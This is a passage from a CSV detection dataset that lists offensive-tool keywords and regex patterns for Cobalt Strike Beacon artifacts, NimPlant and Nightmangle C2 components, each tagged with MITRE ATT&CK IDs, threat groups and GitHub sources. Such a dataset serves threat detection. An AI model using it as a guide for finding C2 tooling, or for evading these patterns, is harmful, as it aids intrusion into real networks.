Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35696" "*beacon_test.exe*",".{0,1000}beacon_test\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default artifact name generated by Cobalt Strike. Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35697" "*beacon_top 
*",".{0,1000}beacon_top\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35698" "*beacon_top_callback*",".{0,1000}beacon_top_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35699" "*BeaconApi.cs*",".{0,1000}BeaconApi\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 
- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35700" "*beacon-c2-go*",".{0,1000}beacon\-c2\-go.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z","35701" "*BeaconCleanupProcess*",".{0,1000}BeaconCleanupProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda 
- NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35702" "*BeaconConsoleWriter.cs*",".{0,1000}BeaconConsoleWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35703" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35704" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented 
using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35705" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35706" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","35707" "*beacongrapher.py*",".{0,1000}beacongrapher\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35708" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35709" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35710" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","35711" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","35712" 
"*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35713" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an 
advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - 